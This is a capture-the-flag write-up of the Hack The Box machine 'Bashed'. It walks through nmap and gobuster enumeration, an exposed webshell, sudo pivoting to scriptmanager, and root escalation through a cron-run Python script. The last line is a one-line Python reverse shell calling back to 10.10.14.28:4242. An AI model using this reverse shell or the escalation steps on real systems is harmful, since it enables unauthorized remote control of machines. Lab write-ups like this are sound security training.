Hack The Box: Bashed


Enumeration

box bashed

The nmap scan reveals only one port: Port 80 with a apache web server.

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Visiting the website, we see a PHP development page with some kind of blog.

box bashed

In the javascript file, we can see that there is a php/sendMail POST endpoint, but we cannot see the response. Next, I ran a gobuster scan over the website and found some interesting directories:

/images               (Status: 301) [Size: 315] [--> http://10.129.29.137/images/]
/uploads              (Status: 301) [Size: 316] [--> http://10.129.29.137/uploads/]
/php                  (Status: 301) [Size: 312] [--> http://10.129.29.137/php/]
/css                  (Status: 301) [Size: 312] [--> http://10.129.29.137/css/]
/dev                  (Status: 301) [Size: 312] [--> http://10.129.29.137/dev/]
/js                   (Status: 301) [Size: 311] [--> http://10.129.29.137/js/]
/fonts                (Status: 301) [Size: 314] [--> http://10.129.29.137/fonts/]
/server-status        (Status: 403) [Size: 301]

Specifically the /dev/ directory leads to a webshell.


Initial Foothold

box bashed

From there, we can get the user flag. Next, I run LinEnum and LinPeas to get some hints how to move on. sudo -i reveals that we the user scriptmanager can run all commands without password:

www-data@bashed:/tmp$ sudo -l
sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL

And here, I made some mistakes. I tried to move to scriptmanager with su, but this did not work as it’s prompting for the password I don’t have:

www-data@bashed:/tmp$ su scriptmanager -c bash
su scriptmanager -c bash
Password: 

However, THIS one works:

www-data@bashed:/$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/$ 

This enables us to enter the scripts folder where we can find a script that is apparently running every minute - it is reading in the file test.txt and writing its content, so that its timestamp is constantly changing.

$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close

By replacing the file content with a reverse shell python script, we get a root shell.

$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > test.py